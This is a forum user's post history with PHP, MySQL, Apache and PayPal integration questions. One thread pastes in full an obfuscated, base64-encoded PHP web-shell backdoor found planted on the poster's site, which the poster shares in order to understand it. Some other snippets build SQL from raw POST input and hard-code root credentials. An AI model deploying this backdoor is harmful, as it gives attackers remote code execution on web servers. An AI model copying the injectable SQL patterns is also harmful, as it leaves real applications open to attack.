Posts by slyme

It just got a bit more odd ...

So, I decided to header('Location: page.php') in the hope that requesting the page anew would solve the problem. It didn't. I had to refresh again (?!) to get the correct result.

Then ... I put it on my external server to show someone what was happening and it worked as expected on that server.

I haven't tried my original approach (including data.php twice) on the external server as I'm confused enough already and the issue is solved in a functional sense - I can hand the page over to the user as is.

But I still want to know what/why/how did this happen (it's definately bothering me that I don't understand this) so I'll leave this open for a bit in case anyone has any pointers.

Thanks to all for your help.

The array is created when data.php is included - the array is the data in that file. Yes, that unset was a bit of a long shot.

Thanks for taking a look diafol.

I didn't lay out all of the code hoping that there was an obvious and glaring mistake with the general principle that I had adopted.

So, here's the add function ($the_file is products.php):

function add_product($the_file) {
    $result = "<?php\n";
    $name = htmlentities($_POST['new_name'], ENT_QUOTES, 'UTF-8');
    $unit_price = htmlentities($_POST['new_unit_price'], ENT_QUOTES, 'UTF-8');
    $image = htmlentities($_POST['new_image'], ENT_QUOTES, 'UTF-8');
    $description = htmlentities($_POST['new_description'], ENT_QUOTES, 'UTF-8');
    $result .=  '$' . "product_array[0]['name'] = '$name';\n";
    $result .=  '$' . "product_array[0]['unit_price'] = '$unit_price';\n";
    $result .=  '$' . "product_array[0]['image'] = '$image';\n";
    $result .=  '$' . "product_array[0]['description'] = '$description';\n\n";
    include 'includes/products.php';
    $i = 1;
    foreach ($product_array as $product) {
        $name = $product['name'];
        $unit_price = $product['unit_price'];
        $image = $product['image'];
        $description = $product['description'];
        $result .=  '$product_array[' . $i . "]['name'] = '$name';\n";
        $result .=  '$product_array[' . $i . "]['unit_price'] = '$unit_price';\n";
        $result .=  '$product_array[' . $i . "]['image'] = '$image';\n";
        $result .=  '$product_array[' . $i++ . "]['description'] = '$description';\n\n";
    }
    unset($product_array);
    $result .= "?>\n";
    $file_handle = fopen($the_file, "w") or die("Unable to open file!");
    fwrite($file_handle, $result);
    fclose($file_handle);
    $_SESSION['added'] = true;
    $add_result = '<div id="add_result">Product added.</div>';
    return $add_result;
}

Thanks again for any help.

Two files to edit/maintain a data array.
data.php looks something like this:

<?php

$data_array[0]['key1'] = 'value';
$data_array[0]['key2'] = 'value';

$data_array[1]['key1'] = 'value';
$data_array[1]['key2'] = 'value';

$data_array[2]['key1'] = 'value';
$data_array[2]['key2'] = 'value';

?>

admin.php works something like this:

function get_data() {
    include 'data.php';
    // do a load of stuff with $data_array to create an HTML form
    // so that the user can edit it.
    return $html_form;
}

function add_record() {
    include 'data.php';
    // read the POST data and format it into a string
    // read $data_array into a string and append that string the POST data string
    // write string back to data.php overwriting the contents
    return $result;
}

function edit_record() {
    // read the POST data and format it into a string (except where a record is marked for deletion)
    // write string back to data.php overwriting the contents
    return $result;
}

if ($_POST['submit'] == 'add record') {
    echo add_record();
}
if ($_POST['submit'] == 'edit record') {
    echo edit_record();
}
echo get_data();

When I simply open the page everything works as expected. I can see all of the correct data in the form.

If I edit the data it all loads properly, complete with the new data and deleted records have gone.

However, if I add a new record then $data_array does not load properly - it loads the last version without the new record. If I look at the file I find that it has been updated. If I reload the page I will see the …

I have a plug-in for a payment gateway for a WordPress installation with a WooCommerce shopping plug-in.

The payment gateway plug-in fails at the checkout. The error message may be a distraction at this point as I only want some more general advice. The error is suggesting some problem with the CGI configuration.

The support people for the plug-in have suggested the following:

1) CGI request and response must be uploaded in binary mode

2) CGI request and response must be executable (755)

3) CGI request and response must be in the right version (32/64bits, static/glib, prefer 64bits static)

4) Paths to CGI request and response must be right

Okay - 1 and two I can deal with.

Here's my questions: What does 3 mean and how do I find out the version I'm running? Does 4 simply mean the path to the cgi-bin?

I will ask these questions of the support people but I wanted to investigate first - I am embarrassed at my lack of success finding anything using Google!

Yes, sorry about one and three looking the same ... I can't figure out how to get the inline code editor to display properly - here's three again:

SELECT detail FROM options WHERE `option` = 'site name'

Hello,

I am getting a bit confused regarding apostrophes in my SQL statement. I can get it to work but I would like to understand why it works when it does or, conversely, why it doesn't work when it doesn't. If you know what I mean. Anyway - here goes:

This doesn't work and it produces an error:

SELECT detail FROM options WHERE option = 'site name'

This doesn't work but simply returns an empty data set:

SELECT detail FROM options WHERE 'option' = 'site name'

This does work:

SELECT detail FROM options WHERE option = 'site name'

I am having trouble getting the correct apostrophe into the above code - option should be encased in the same apostrophe that seems to delineate inline code and I can't figure out how to escape it.

As you can see the difference is all about the apostrophes.

Any explanation would be most welcome, thank you.

Simon.

This is just me trying to figure out how to escape the apostrophe:
SELECT detail FROM options WHERE ``option`` = 'site name'

Hi, Diafol,

Thanks for that link. It helped in so much as it gave me a slightly different formula to get the same result and most helpfully, for my confidence in what I'm doing, it confirmed to me that I was on the right track in respect of the procedure that I'm using.

Unfortunately, using the code on the page produced the same problem.

Thanks anyway, I appreciate the effort you have taken,

Simon.

So, I'm guessing that it should be: AuthUserFile "/home/machiahd/public_html/passwd/.htpasswds

However, if you want to be sure of the path, create a file called path.php and put this in it:<?phpecho realpath("path.php"); ?>

Upload it so that it is in the same directory as your .htpasswds file and then browse to it. You will see the necessary path detail. You will need to remove path.php from the string before you use it of course.

hope this helps,

Simon.
`

I believe that it should look something like this:

$my_conn = new mysqli('localhost', 'user name', 'password', 'database name');
$sql = "SELECT * FROM messages";
$result = $my_conn->query($sql);
while ($obj = $result->fetch_object()) {
    echo = $obj->message;
}

I could easily be wrong though ...

hope this helps,

Simon.

AuthUserFile "/home/machiner/.htpasswds/public_html/passwd looks a bit iffy to me (I could be wrong, very easily!). Should it beAuthUserFile "/home/machiner/public_html/passwd/.htpasswds perhaps?

Hi Everybody,

I hope someone can help with this, it's taken so long to get this close but I just can't figure out the last small (but show stopping) detail.

I start with a string of text and a font-face entered/selected via a form. I am using imagettfbbox to determine the overall dimensions and the descent (height below the baseline) value of the string using the selected font.

Then I create an image using those dimensions and create the same text in that image using the same font (again, using imagettfbbox).

I position the imagettfbbox at x = 0 and y = overall height minus the descent value (I believe that that is how I calculate the baseline position of the string).

The goal is to create an image with all of the string visible but with no extra white space. It almost works.

I have found one character (so far) that has a problem with height using a normal font (§).

I have found several characters that cause a problem depending on whether I use a normal, italic or bold.

These characters seem to be cut off in the x axis if they are at the beginning or at the end of the string.

I'm guessing that I'm making a mistake somewhere when I calculate the dimension/descent.

You can see the output here: Click Here

Here is the code for the form page:

<?php
// Path to fonts (this will need to be changed to reflect the …

JorgeM ... well that worked! thank you so much.

ellana980 ... that's what I thought it should be but it didn't work.

Thank you both of you.

Simon.

JorgeM, thank you so much for your help with this ... I will try out this code first thing tomorrow.

cheers,

Simon.

Thanks JorgeM ... this was so close! If I use your code the index.php page does return but the $_GET['page'] variable returns 'index.php' and the link for the CSS file referenced in the page head fails to load ... getting closer all the time though! thanks for your help.

Try this, it processes everything before updating the database:

<?php
// Set your variables to empty if they haven't been submitted:
if (isset($_POST['First_Name'])) {
    $First_Name = $_POST['First_Name'];
} else {
    $First_Name = '';
}
if (isset($_POST['Last_Name'])) {
    $Last_Name = $_POST['Last_Name'];
} else {
    $Last_Name = '';
}

if (isset($_POST['Email'])) {
    $Email = $_POST['Email'];
} else {
    $Email = '';
}
if (isset($_POST['Code'])) {
    $Code = $_POST['Code'];
} else {
    $Code = '';
}
if (isset($_POST['Phone'])) {
    $Phone = $_POST['Phone'];
} else {
    $Phone = '';
}
// Create message variables:
$outputMessage = '';
$errorMessage = '';
// Check if submit clicked:
if (isset($_POST['submit'])) {
    // Check fields are filled in:
    if (empty($First_Name)) {
        $errorMessage .= "<li>You forgot to enter your First Name</li>";
    }
    if (empty($Last_Name)) {
        $errorMessage .= "<li>You forgot to enter your Last Name</li>";
    }
    if (empty($Email)) {
        $errorMessage .= "<li>You forgot to enter your Email</li>";
    }
    if (empty($Code)) {
        $errorMessage .= "<li>You forgot to enter your Wowcher code you silly person!</li>";
    }
    if (empty($Phone)) {
        $errorMessage .= "<li>ou forgot to enter your Phone Number</li>";
    }
    // Check for error
    if (empty($errorMessage)) {
        // No error, do your database thing:
        mysql_connect ("localhost", "root", "root") or die ('Error: ' . mysql_error());
        mysql_select_db ("wowcher") or die ('Error: ' . mysql_error());
        $query="INSERT INTO wowcher_code(First_name, Last_Name, Email, Code, Telephone)VALUES ('".$First_name."', '".$Last_Name."', '".$Email."', '".$Code."', '".$Phone."')";
        mysql_query($query) or die ('Error updating database because: '.mysql_error());
        mysql_close();
        // Empty the variables and set output message:
         $First_Name = '';
         $Last_Name = '';
         $Email = '';
         $Code = ''; …

Hi, thanks for looking at this post.

I have searched and experimented and after hours of getting really close I have finally admitted to my self that I'm going to have to stop and ask directions!

So, I want the browser address http://drivingmeinsane/Join to be re-written to http://drivingmeinsane/?page=Join

I've come really close ... here's my best effort:

Options +FollowSymlinks
RewriteEngine on
RewriteBase /
RewriteRule ^(Join|Sponsor|Contact)/?$ ?page=$1

Two problems:

1) (Join Us|Sponsor Us|Contact Us) does not work.
2) I don't really want to list all of the possible variables because it will be a dynamic list that can change.

I have tried replacing (Join Us|Sponsor Us|Contact Us) with all sorts, for example (.*) but to no avail.

Can anyone help please?

Thanks,

Simon.

I shed blood sweat and tears writing mail scripts (it's usually something to do with the boundaries or new line characters) until I found this: http://code.google.com/a/apache-extras.org/p/phpmailer/wiki/PHPMailer?tm=6

This might help ... http://css-tricks.com/dynamic-dropdowns/

I have created a customised shopping cart coded in PHP. Once the user has filled their cart they hit checkout and all of the details, including the address detail, are posted into a PayPal shopping cart and the user can pay using a PayPal account or a credit card.

After the user has paid, PayPal re-directs (and here's the problem - see below) the user back a page on my site. This page conducts a brief to and fro with the PayPal server and, providing everything matches properly, a PDF invoice is emailed to the customer, a despatch note to the store guy and a copy invoice goes to the accounts office.

The problem: If the customer fails to return from the PayPal site then none of the order processing takes place. There are a few factors that may prevent the customer returning to the site and I need to factor this possibility in.

So, my question is, can someone tell me if I use the PayPal IPN system will it send a message to my web server 'listening' page even if the customer doesn't return to the site?

Thanks for your time,

Simon.

Bit of a long shot ... what happens if you set the header location to http//www.website.com/$url ?

Sorted ... I was looking in the wrong place!

Hi All,

I have inherited a web site which is really a bit beyond me ... there's no option though, I've got to figure it out, so ...

The whole site uses Apache/Python/Django/Satchmo. I want to set up a sub-domain which uses a simple Apache/PHP set up.

I'm guessing that I need to add a virtual host to take care of this configuration. Only thing is, the current virtual host set up is causing me concern because I don't properly understand it and I don't want to break it.

It's the *:80 that's particularly bothering me - I get the feeling that if I put another virtual host section in then it will not read it because it's already dealt with it in the section detailed below? At the moment, if I go to subdomain.mydomain.co.uk then I get the same pages as if I had simply gone to mydomain.co.uk.

I am reluctant to experiment without being a little more sure of the outcome because this is on a live server and I cannot duplicate it on a development server (yet).

Here's the current code:

<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	ServerName www.mydomain.co.uk

	Redirect permanent /pure http://myotherdomain.com/pure

	WSGIDaemonProcess simon
	WSGIScriptAlias / /home/simondev/projects/mydomain/apache/django.wsgi

	<Directory /home/simondev/projects/mydomain/apache>
		Order deny,allow
		Allow from all
	</Directory>

	Alias /media/ 	/home/simondev/projects/mydomain/media/
	Alias /static/	/home/simondev/projects/mydomain/static/ 

	<Directory /home/simondev/projects/mydomain/media>
		Order deny,allow
		Allow from all
	</Directory>

	<Directory /home/simondev/projects/mydomain/static>
		Order deny,allow
		Allow from all
	</Directory>

	ErrorLog /var/log/apache2/error.log

	# Possible values include: debug, info, notice, warn, error, …

Hi, that is not sufficient, there are many ways to attack a PHP application you may want to read more about this subject here:

- https://www.owasp.org/index.php/Projects/OWASP_Secure_Web_Application_Framework_Manifesto/Releases/Current/Manifesto
- http://phpsec.org/projects/ & check also /library/

You must check server logs and application logs, review firewall rules, check if there are new processes. You can also try to search more info about this script by searching ppZiAAS8dDJF9Q*(#_+@#TWyJ , it seems this string is in common with other versions of the same script. Bye.

Thanks again cereal ... I shall mark this as resolved and start reading those pages ... there's an awful lot there!

thanks,

Simon.

mark this thread as solved if your problem solved

Hi Karthik_pranas,

Not sure if it is solved yet ... I'm still wondering if I'm doing enough to sanitise any inputs and, if I'm not, could this have been the route a malicious user might have used to upload this file?

I will keep my eye on this and I will mark as solved if/when it is. Thanks for the reminder.

Simon.

Thanks cereal - Wow ... who'd have thought that it meant all that?!

So, I'm guessing that if a browser looked at this file then it will email air@example.com or contact http://www.ya.ru/ with some data depending on the GET/POST fields?

I don't understand how this file got there.

I do 'sanitise' any GET/POST fields that I use as follows:

function sanitise($input){
	if (get_magic_quotes_gpc()) {
		$input = stripslashes($input);
	}
	return htmlentities($input, ENT_QUOTES);
}

Is this good enough?

thanks for your help,

Simon.

I found a file called 4be7.php in the root of my web site.

I guess my first worry is how did it get there? Well, I've changed my FTP log on, what else can I do?

Secondly, what is it? Here's what's in it:

<?php //176e622a9e272282a4a56a9100f5b75d 
 $_= 
//ppZiAAS8dDJF9Q*(#_+@#TWyJ
'Ci8qKgogKiBAdmVyc2lvbiAyLjYKICoKICovCmlmIChpc3NldCgkX1BPU1RbImFjdGlvbiJdKSkKewogICAgICAgIHN3aXRjaCAoJF9QT1NUWyJhY3Rpb24iXSkKICAgICAgICB7CiAgICAgICAgICAgICAgICBjYXNlICJ0ZXN0IjoKICAgICAgICAgICAgICAgICAgICAgICAgdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgInJlZ3VsYXJfdGVzdCI6CiAgICAgICAgICAgICAgICAgICAgICAgIHJlZ3VsYXJfdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgIm1haWwiOgogICAgICAgICAgICAgICAgICAgICAgICBzZW5kKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgZGVmYXVsdDoKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgICAgIHJldHVybjsKfQoKaWYgKGNvdW50KCRfR0VUKSA+IDApCnsKICAgICAgICBmb3JlYWNoICgkX0dFVCBhcyAkaWQgPT4gJGNvZGUpCiAgICAgICAgewogICAgICAgICAgICAgICAgaWYgKCRpZCA9PSAiaWQiKQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAkY29kZSgpOwogICAgICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm47Cn0KCmZ1bmN0aW9uIHRlc3QoKQp7CiAgICAgICAgJGVuY29kZWRfZGF0YSA9ICIiOwoKICAgICAgICAkZGF0YVsidmVyc2lvbiJdID0gcGhwdmVyc2lvbigpOwogICAgICAgIGlmIChpc3NldCgkX1NFUlZFUlsiU0VSVkVSX1NPRlRXQVJFIl0pKQogICAgICAgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICRfU0VSVkVSWyJTRVJWRVJfU09GVFdBUkUiXTsKICAgICAgICB9CiAgICAgICAgZWxzZQogICAgICAgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICJOb3QgQXZhaWxhYmxlIjsKICAgICAgICB9CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBwaHBpbmZvKDgpOwogICAgICAgICRkYXRhWyJtb2R1bGVzIl0gPSBvYl9nZXRfY29udGVudHMoKTsKICAgICAgICBvYl9jbGVhbigpOwogICAgICAgICRkYXRhWyJleHRfY29ubmVjdCJdID0gZm9wZW4oImh0dHA6Ly93d3cueWEucnUvIiwgInIiKSA/IFRSVUUgOiBGQUxTRTsKICAgICAgICAkc2VyaWFsaXplc19kYXRhID0gc2VyaWFsaXplKCRkYXRhKTsKICAgICAgICAkZW5jb2RlZF9kYXRhID0gYmFzZTY0X2VuY29kZSgkc2VyaWFsaXplc19kYXRhKTsKICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl0gLiAkZW5jb2RlZF9kYXRhOwp9CgpmdW5jdGlvbiByZWd1bGFyX3Rlc3QoKQp7CgogICAgICAgICR0byA9ICJhaXJAZXhhbXBsZS5jb20iOwogICAgICAgICRzdWJqID0gIlNVQkohIjsKICAgICAgICAkbWVzc2FnZSA9ICJFSExPIjsKICAgICAgICAkcmVzID0gbWFpbCgkdG8sJHN1YmosJG1lc3NhZ2UpOwogICAgICAgIGlmKCRyZXMpCiAgICAgICAgewogICAgICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl07CiAgICAgICAgfQogICAgICAgIGVsc2UKICAgICAgICB7CiAgICAgICAgICAgIGVjaG8gc3RycmV2KCRfUE9TVFsidGVzdF9tZXNzYWdlIl0pOwogICAgICAgIH0KfQoKZnVuY3Rpb24gc2VuZCgpCnsKICAgICAgICAkY29kZSA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJwcm9qZWN0Y29kZSJdKTsKCiAgICAgICAgZXZhbCgkY29kZSk7CiAgICAgICAgLy9yZXR1cm47Cn0K'; 
 //ppZiAAS8dDJF9Q*(#_+@#TWyJ
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

I have searched on the internet but all pages I've found so far referring to any of this code result in the site trying to download some internet nasty or another on my PC so I'm guessing this is bad stuff!

Any advice welcome.

S.

What you could do is have a shadow form, something like this:

<form method="post" id="preview" target="_blank" action="preview.php">
  <input type="text" name="title">
  <textarea name="content"></textarea>
</form>

And then, if you click the preview button, write a script that puts the contents of you real form into this one and submit it.
Edit: perhaps it's better if you use target="preview", so that if you click preview again, it comes in the same window.

This is where it all started for me Twiss .... I wrote two forms and filled one with hidden fields which mirrored the fields available to the user.

This form would submit to a pop up and the user facing form would post to the appropriate action page in the main window.

I used onchange to keep the hidden fileds in sync with the user facing ones. That's when I discovered that onchange didn't work for the TinyMce textareas.

A little bit of research on TinyMce and I found function that went in the tinyMCE.init which updated as required just like the onchange script that I had written.

Only thing is, it was very unreliable, sometimes it worked sometimes it didn't and the editor was often very buggy.

Hence the conclusion that I will have to use the same form for preview as well as save and I will have submit it to get a reliable result from those TinyMce textareas (there's up to four on a page).

Ah well ... I'm going to wrap …

popup windows dont work, too many have them blocked by default, layers in the current window operate without being blocked,

like the kudos window above right on this post

Boy is that obvious :P

Luckily, only two people will be using this page and they will be allowing popups ...

Unfortunately, I can't use your marvelous solution for this one(but I will be using it elsewhere thanks very much!).

For all sorts of reasons, I have to go to a different page to display the preview - it just would not work in the same page as the edit/save routine.

A pop up would be a most elegant solution but if I can't do that then I'm going to have to do it all server side by passing the variables from page to page as we go.

I'm going to stick at it for a bit ... as ever, all comments/advice most welcome.

Now, I know I'm gonna be red faced for asking this but I reckon I'd be more stupid if I didn't ask a question when I don't understand something, so, ... kudos window ... ? ... what kudos window? :-)

thanks,

Simon.

Perhaps this helps: http://tinymce.moxiecode.com/wiki.php/How-to_load/save_with_Ajax_in_TinyMCE

I checked it out .... I could not figure it out Twiss, but thank you all the same ... I get the impression that this would do what I want it to but I don't really understand it .... I am a PHP'er and very new to JavaScript.

Thanks Twiss,

I figured out the GET option ... two problems ... one input will often hold far too much data and also I have real difficulties reading the contents of that input because it is using something called TinyMce as a sort of HTML editor and this really complicates things ... I have to submit the form before I can reliably read the content of that input.

I am already using jQuery in the page so maybe the answer is there ... I will do a bit more research, I'm guessing I'm gonna be back here asking more questions so I won't close this thread yet.

Any more comments/advice/ pointers greatly appreciated,

Simon.

Hi,

Very new to JavaScript so I'm sorry if this is a daft question, I have searched for answers first and could not find anything that works for me ... so ..

The task:

One html form with two submit buttons. On submit (save changes) posts back to the same page and updates a database. The other submit button (preview) should open a pop-up showing what the data would look like if the user should press save.

My efforts so far:

This might not look like much of an effort but, trust me, I took a long time to get this far!

I have figured out how to open the pop-out using this code:

<form action="index.php" method="post">
	<input type="text" name ="text_1" value="default" /><br />
	<textarea name="text_2">default</textarea><br />
	<input type="submit" value="preview" onclick="window.open('preview.php', '', 'width=400 height=500')" /><br />
	<input type="submit" value="save changes" />
</form>

How do I submit the form data to the pop up? I have arrived at some solutions using onsubmit in the form tag but that messes up the 'save changes' action.

Any help would be so gratefully received,

Simon.

Thanks drjohn ... 'SOM ' (with the space) doesn't work but I feel that you have put me on the right track ... perhaps the answer is to use LIKE for one word searches and MATCH() AGAINST() for multi word searches ... although that still doesn't work if i search for 'SOM 1', and now I do understand why. Perhaps a more complex test before deciding which SELECT statement to use.

I shall leave this thread open for a bit in case anyone else knows a more elegant solution then I shall mark it solved.

thanks everyone,

Simon.

here's a thought ... what if I:

1. search using LIKE and create an array
2. then search using MATCH() AGAINST() and create another array
3. merge the two arrays ditching any duplicates in the process

is that a bit heavy handed? Comments? A better solution?

You could try going into phpmyadmin and posting this. "SELECT * FROM products WHERE MATCH(product_name) AGAINST ('SOM')".
The output there might make things clearer for you.

Brilliant idea ... why didn't I think of that? So off I went and did the above, fully expecting it to work therefore indicating that the problem would be somewhere in my code. Nope. Same results.

So ... here's the table:

CREATE TABLE IF NOT EXISTS `test` (
  `product_id` int(11) NOT NULL AUTO_INCREMENT,
  `product_name` varchar(300) NOT NULL,
  `category` varchar(200) NOT NULL,
  `product_desc` varchar(300) DEFAULT NULL,
  `description_left` text,
  `product_note` varchar(200) DEFAULT NULL,
  `discount_note` varchar(200) DEFAULT NULL,
  `left_panel` text,
  `options_panel` text,
  `discount` tinyint(1) NOT NULL DEFAULT '0',
  `product_image` varchar(200) NOT NULL,
  `image_alt` varchar(200) DEFAULT NULL,
  `image_hyperlink` varchar(200) DEFAULT NULL,
  `hyperlink_text` varchar(200) DEFAULT NULL,
  `rank` int(11) NOT NULL DEFAULT '0',
  `lower_text` varchar(300) DEFAULT NULL,
  `extra_options` text,
  PRIMARY KEY (`product_id`),
  FULLTEXT KEY `category` (`category`),
  FULLTEXT KEY `product_name` (`product_name`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=296 ;

Here's some data:

INSERT INTO `test` (`product_id`, `product_name`, `category`, `product_desc`, `description_left`, `product_note`, `discount_note`, `left_panel`, `options_panel`, `discount`, `product_image`, `image_alt`, `image_hyperlink`, `hyperlink_text`, `rank`, `lower_text`, `extra_options`) VALUES
(19, 'SOM 1 - Coloured option', 'School of Motoring', 'Available in Black, Red or Silver', 'Only available in som 1\r\nnon illuminated with graphics', 'For a small additional fee the SOM 1 roof sign can be spray painted\r\nprior to the application of your graphics', '', NULL, NULL, 0, 'images/assets/som-black.jpg', 'magnetic top box roof signs', 'images/assets/som/som01-roof-sign.pdf', 'click image for more details', 12, '', 'Black\r\nRed\r\nSilver'),
(224, 'SOM 2 - …

Hi,
If I run the following mysql_query: SELECT * FROM products WHERE product_name LIKE '%SOM%' I get the following results:
SOM 1 - Coloured option
SOM 2 - Magnetic Roof Sign
SOM 4 - Magnetic Roof Sign - Centre L
SOM 6 - Magnetic Roof Sign - Curved Top
SOM 7 - Magnetic Roof Sign - Angled L
SOM 10 - Magnetic Roof Sign - Pyramid
SOM 12 (Top Hat) - Magnetic Roof Sign
SOM 1 - Magnetic Roof Sign
If I run this query: SELECT * FROM products WHERE MATCH (product_name) AGAINST ('SOM') I get no results. Surely I should be getting the same results from each in this case? If I use 'Magnetic Roof Sign' as a search term then I do get the results that I expect.

Can anyone give me a clue where to look please? Do I need to post any more code/detail?

Thanks,
Simon.

Haven't read this all in too much detail so maybe I've got the wrong idea ... still, here's a thought ...

Do you want to take the $_GET values and pass them to the next page when the user clicks submit on a form?

You can leave the action blank and then the form submits to the same URL along with the variables. Then you have to manage any form actions in the same page.

Or ... can't you take the incoming $_GET fields and put them into hidden inputs in your form and then $_POST them along with the new data?

Sorry if I've missed the point but it might be useful ...

I used get to get this problem a lot and worked around it until I figured out that you need put all header('Location: index.php'); type expressions before you send any page headers.

It looks to me like you are doing this in the middle of the html document, in fact you are echoing some strings before your header expression.

My best guess is that you should put all of this code right at the top of the document.

Put anything that you need to echo into variables and echo them in the html document.

Keep all your header expressions at the top (before any text is echoed or any html headers are sent).

If you need to carry info with the redirect then use the URL to create $_GET

Hope this helps,

Simon.

It's not even getting that far ... the mail function fails. It would help if I knew how to retrieve some sort of error message - I just get True or False. I'm sure that there is a way to get more error detail .... I'm researching that one right now ...

I want to send an email and I am using the code below. It always works on my test server and my production server which are both IIS on Windows. It sometimes works the client's server. Once or twice in ten it sends. The client's server is running Apache on Linux. Could this be significant? Any other ideas why it would only work intermitently?

I have included everything except input validation (way too much code - not needed for testing) and the three images. If anyone is kind enough to test this for me then the images can be found here:

http://www.slymedesign.co.uk/images/top.png
http://www.slymedesign.co.uk/images/welcome-top.jpg
http://www.slymedesign.co.uk/images/welcome-bottom.jpg

Although, to be honest, I don't think that the email is the problem. I get similar results if I strip the email message right down to simple 'Hello World' stuff.

<?php

$ready_to_send = false;
$send_status = '';

if (isset($_POST['submit'])) {
	$to = $_POST['email'];
	$ready_to_send = true;
}

if ($ready_to_send) {
	$top_png = chunk_split(base64_encode(file_get_contents('top.png')));
	$welcome_top_jpg = chunk_split(base64_encode(file_get_contents('welcome-top.jpg')));
	$welcome_bottom_jpg = chunk_split(base64_encode(file_get_contents('welcome-bottom.jpg')));
	$subject = 'Multipart Email Test'; 
	$headers = "From: $to\r\nReply-To: $to"; 
	$headers .= "\r\nContent-Type: multipart/related; type=\"multipart/alternative\"; boundary=\"----=_NextPart_000_0070_01CAFD85.CD836AE0\""; 
	ob_start();
?>
This is a multi-part message in MIME format.

------=_NextPart_000_0070_01CAFD85.CD836AE0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_001_0071_01CAFD85.CD836AE0"


------=_NextPart_001_0071_01CAFD85.CD836AE0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

      Great! You have successfully registered as a curbappeal user....

      You are now in the privileged position of receiving updates on the new stylish venues to try out around the globe. As a registered member you are also entitled to receive offers negotiated …

Thanks guys ... I asked the question out of curiosity and your answers have made me realise that this is really quite relevent to the code I'm having problems with.

Thank you very much,

Simon.

I have seen the mail function preceded with an @ symbol. I have tried it in my code and I cannot see what difference it makes.

I have searched Google and the PHP documentation and I have not been able to find an explanation for this @ symbol.

Would someone kindly point me in th right direction please?

stripslashes is a function which returns a string. It has no effect on the string itself. A statement such as "stripslashes($input)" has no effect on the $input variable as such. You probably intended something like "$input = stripslashes($input)".
HTH

Thanks Simon, I just knew it was going to be something that was staring me in the face - I'm just glad it wasn't something even more basic like a semi-colon missing at the end of a line!

Thank you so much for taking the trouble to help,

Simon.

I don't want slashes in my $_POST values. I want to deal with that kind if thing myself.

I am having problems getting rid of said slashes. You can see the results of the following code here: http://www.slyme.co.uk/sanitise.php

View the source - htmlentities seems to work, stripslashes doesn't unless I do this:

echo stripslashses($test_string);

I want to do all sorts of processing and would rather use functions but I just can't see why I can't get it right in a function or an if statement.

check out this page:

<?php
function sanitise($input){
	if (get_magic_quotes_gpc()) {
		stripslashes($input);
	}
	return htmlentities($input, ENT_QUOTES);
}
function un_sanitise($input){
	if (get_magic_quotes_gpc()) {
		stripslashes($input);
	}
	return $input;
}
if (isset($_POST['test'])) {
	$test_string = $_POST['test'];
} else {
	$test_string = '';
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
#wrap {width:400px; margin-left:auto; margin-right:auto;}
.box {border:1px solid #CCCCCC; margin:5px;padding:5px;}
.title {font-weight:bold;}
-->
</style>
</head>

<body>
<div id="wrap">
	<div class="box">
		<div class="title">Magic Quotes</div>
		<?php
		if (get_magic_quotes_gpc()) {
			echo 'Magic Quotes On';
		} else {
			echo 'Magic Quotes Off';
		}
		?>
	</div>
	
	<div class="box">
		<div class="title">Raw String</div>
		<?php echo $test_string ?>
	</div>
	
	<div class="box">
		<div class="title">Strip Slashes</div>
		<?php
		if (get_magic_quotes_gpc()) {
			stripslashes($test_string);
		}
		echo $test_string;
		?>
	</div>
	
	<div class="box">
		<div class="title">Sanitise</div>
		<?php
		if (get_magic_quotes_gpc()) {
			stripslashes($test_string);
		}
		echo htmlentities($test_string, ENT_QUOTES);
		?>
	</div>

	<div class="box">
		<div class="title">Sanitise Function</div>
		<?php
		echo sanitise($test_string);
		?>
	</div>

	<div class="box">
		<div class="title">Strip Slashes …

create a variable before the loop and set its value to 1

inside the loop, call your radio button something like my_button_X where X is the value created above.

then add one to the variable before ending the loop.

You could also send the final value of the variable as a hidden field which can be useful when processing the radio button inputs.

How to use while loop to loop a set of radio button groups? I have several questions that retrieve from database and each question has five different ratings named 1, 2, 3, 4 and 5. I create radio button group for the rating and using while to loop them. I know I have to create a unique name for radio buttons for each row but how to increment the value automatically for each row? I didn’t retrieve any value from database when I create the radio button group. All the data is arrange in the table. Besides, I need to save each selected value into database. I am using php. Anyone got ideas for my question. Thanks for your kindly reply.

Is "one two three" one form field? If so, you will first need to check for more than one word and then form your query to search the record field for one OR two OR three.

I am sure this can be achieved in the SQL SELECT statement but I don't know how so I would do it whilst looping through the results.

Hi, thanks for reading this ...

I am passing this value (for example) to PayPal:

<input type="hidden" name="item_name" value="Ménàge à Trois California Red Wine 2007">

The Pay Pal Shopping Cart displays this value as 'M�n�ge � Trois California Red Wine 2007'

I'm guessing that this has something to do with character sets or some such - I have tried a few different ways of coding the special characters but so far no luck ... any one got a clue?

thanks,

Simon.

hi,

can i just ask, does an sql query go into PHP, what i mean is when you see sql queries for querying the database does it go into your PHP script or is this something you need to do aswel as?

many thanks

